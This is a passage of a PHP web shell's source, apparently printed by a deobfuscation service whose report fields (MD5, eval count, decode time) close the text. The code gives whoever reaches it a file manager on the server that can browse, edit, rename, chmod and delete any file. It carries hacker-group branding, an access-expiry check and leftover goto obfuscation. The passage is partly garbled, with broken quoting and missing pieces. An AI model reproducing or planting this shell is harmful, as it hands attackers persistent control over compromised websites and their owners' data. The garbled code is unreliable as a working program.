</form>"; } elseif ($_POST["opt"] == "rename") { if (isset($_POST["newname"])) { if (rename($_POST["path"], $path . "/" . $_POST["newname"])) { alert("Rename Success"); kabur("?path={$path}"); } else { alert("Rename Failed"); } $_POST["name"] = $_POST["newname"]; } echo "<form method="POST">New Name : \xa<input class="kan" name="newname" type="text" size="20" value="" . $_POST["name"] . "" />\xa<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa<input type="hidden" name="opt" value="rename">\xa<input class="kan" type="submit" value="Save" />
</form>"; } elseif ($_POST["opt"] == "edit") { if (isset($_POST["src"])) { $fp = fopen($_POST["path"], "w"); if (fwrite($fp, $_POST["src"])) { echo "<table style="background: #011111;border-radius:6px;border: 1px lime solid;" width="100%" align="center"><td>"; echo "<font color="lime">Success Edit File</font><br/>"; } else { echo "<font color="red">Failed Edit File</font><br/></table>"; } fclose($fp); } echo "<form method="POST">
<textarea class="colz" cols=42 rows=20 name="src">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br />
\xa<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa<input type="hidden" name="opt" value="edit">
<input class="kan" style="width:99%" type="submit" value="Save" />
</form></table>"; } echo "</center>"; } else { echo "<br/><center>"; if (isset($_GET["option"]) && $_POST["opt"] == "delete") { if ($_POST["type"] == "dir") { if (rmdir($_POST["path"])) { alert("The directory has been deleted :v"); } else { alert("Directory failed to delete :D"); } } elseif ($_POST["type"] == "file") { if (unlink($_POST["path"])) { alert("The file has been deleted :v"); } else { alert("File failed to delete :D"); } } } echo "</center>"; $scandir = scandir($path); echo "<div id="content"><table style="direction:ltr;overflow:auto;page-break-inside:avoid;background: #011111;border-radius:6px;border: 1px lime solid;" width="100%" cellpadding="2" align="center">\xa<tr class="first">
<td><center>Prmisn</center></td>\xa<td><center>Modify</center></td>\xa</tr>"; foreach ($scandir as $dir) { if (!is_dir($path . "/" . $dir) || $dir == "." || $dir == "..") { continue; } echo "<tr><td><img src="" width="6%"> <a href="?path=" . $path . "/" . $dir . "">" . $dir . "</a></td>
<td><center>-</center></td>\xa<td><center><font size="1">"; if (is_writable($path . "/" . $dir)) { echo "<font color="lime">"; } elseif (!is_readable($path . "/" . $dir)) { echo "<font color="red">"; } echo perms($path . "/" . $dir); if (is_writable($path . "/" . $dir) || !is_readable($path . "/" . $dir)) { echo "</font>"; } echo "</center></font></td><td>
\xa\xa<center><form method="POST" action="?option&path=" . $path . "">\xa<select class="kan" style="width: 40%;" name="opt">
<option value="">#</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>\xa<option value="rename">Rename</option>\xa</select>
\xa<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="" . $dir . "">\xa<input type="hidden" name="path" value="" . $path . "/" . $dir . "">
<input class="kan" type="submit" value=">">
</form></center></td>\xa</tr>"; } echo "<tr class="first"><td></td><td></td><td></td><td></td></tr>"; foreach ($scandir as $file) { if (!is_file($path . "/" . $file)) { continue; } $size = filesize($path . "/" . $file) / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr><td>
<img src="" width="6%">
<!--<font size="3">-->\xa <a href="?filesrc=" . $path . "/" . $file . "&path=" . $path . "">" . $file . "</a>
<font size="1">" . $size . "</font></center></td>\xa<td><center><font size="1">"; if (is_writable($path . "/" . $file)) { echo "<font color="lime">"; } elseif (!is_readable($path . "/" . $file)) { echo "<font color="red">"; } echo perms($path . "/" . $file); if (is_writable($path . "/" . $file) || !is_readable($path . "/" . $file)) { echo "</font>"; } echo "</center></font></td><td><center>
\xa\xa\xa<form method="POST" action="?option&path=" . $path . "">\xa<select class="kan" style="width: 40%;" name="opt">
<option value="">#</option>\xa<option value="delete">Delete</option>\xa<option value="chmod">Chmod</option>\xa<option value="rename">Rename</option>
<option value="edit">Edit</option>
\xa<input type="hidden" name="type" value="file">\xa<input type="hidden" name="name" value="" . $file . "">
<input type="hidden" name="path" value="" . $path . "/" . $file . "">
<input class="kan" type="submit" value=">">
</form></center></td>\xa</tr>"; } echo "</table></div>"; } echo "<br/><center><table bordercolor="lime" style="border-radius:4px;width:92%;" align="center"><td>\xa
<b><center><a href="?exit">Copyright</a> © " . date("Y") . " - <a href="mailto:[email protected]"><font color="lime">Tex7ure</a></font> | <a href=" Exploit ID" target="_blank"><font face="New Rocker" size="2">Hillusion Exploit ID</a></font>
\xa</body>\xa</html>"; } else { echo "<html><head>\xa<meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no'></head>
<style>\xabody {\xa background: black;
font-family: iceland;
color: white;
<center> <font color=lime><b>[!] Warning [!]</b><br>"; date_default_timezone_set("Asia/Jakarta"); $anj = date("Y-m-d"); echo "<table border="1" bordercolor="lime" align="center">\xa<tr><td>"; echo "\xa<font color=white>Your Access Expired<td><font color=white>Date. In : <font color=lime><b>{$anj} </b></td></tr><tr><td><font color=white>Regist : <font color=lime><b>{$awal}</b><td><font color=white>Expired : <font color=lime><b>{$expired} </b></td></table></center>"; } goto Uogfg; BozPb: $expired = date("2024-01-21"); goto QZTPI; eDE58: error_reporting(0); goto VUOHb; Qvgw3: ZeahE: goto cFKiU; og3XE: l20Ep: goto wZ_nc; KyeiS: MAZ_m: goto pmRhb; Uogfg: goto MAZ_m; goto dd2X3; b7dfR: goto ZeahE; goto IR4it; bq_a0: goto dMZLI; goto efDM
Function Calls
None |
MD5 | 2bba33155ac58839cb28fb3710493424 |
Eval Count | 0 |
Decode Time | 76 ms |